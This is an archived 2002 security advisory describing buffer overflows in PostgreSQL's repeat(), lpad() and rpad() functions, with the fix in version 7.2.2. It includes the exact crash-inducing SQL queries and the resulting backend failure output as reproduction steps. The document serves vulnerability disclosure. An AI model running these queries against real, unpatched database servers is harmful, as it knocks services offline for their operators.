Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: lnx5647.htm

PostgreSQL Remote and Local Buffer Overflows



21th Aug 2002 [SBWID-5647]
COMMAND

	
		PostgreSQL remote and local buffer overflows
	
	

SYSTEMS AFFECTED

	
		all versions
	
	

PROBLEM

	
		In Sir Mordred The Traitor, Mordred Labs advisory [0x0003] and  [0x0004]
		:
		

		 Bug 1

		 =====

		

		Upon invoking a repeat() function, a
		 

		src/backend/utils/adt/oracle_compat.c::repeat() function

		

		will gets called which suffers from a buffer overflow.
		

		 --[ How to reproduce:

		 

		psql> select repeat('xxx',1431655765);

		pqReadData() -- backend closed the channel unexpectedly.

		        This probably means the backend terminated abnormally

		        before or while processing the request.

		The connection to the server was lost. Attempting reset: Failed.

		

		

		 Bug 2

		 =====

		

		There        are         two         buffer         overflows         in
		src/backend/utils/adt/oracle_compat.c.
		

		 1) lpad(text, integer, text) function

		 2) rpad(text, integer, text) function

		

		 --[ Details:

		

		The code for this functions is
		 

		src/backend/utils/adt/oracle_compat.c::lpad() and

		src/backend/utils/adt/oracle_compat.c::rpad() respectively.

		

		The code suffers from a buffer overflow (of course).
		

		 --[ How to reproduce:

		 

		shell> pgsql template1 postgres

		template1=# select version();

		                          version

		-----------------------------------------------------------

		 PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96

		(1 row)

		

		template1=# create database my_db with encoding='UNICODE';

		CREATE DATABASE

		template1# c my_db

		You are now connected to database my_db.

		

		my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');

		pqReadData() -- backend closed the channel unexpectedly.

		        This probably means the backend terminated abnormally

		        before or while processing the request.

		The connection to the server was lost. Attempting reset: Failed.

		!#

		

		The same for rpad() function.
		

		The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR,  EUC_TW,  UNICODE,
		MULE_INTERNAL.
	
	

SOLUTION

	
		 Update (26 August 2002)

		 ======

		

		ftp://ftp.postgresql.org/pub/sources/v7.2.2

		

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH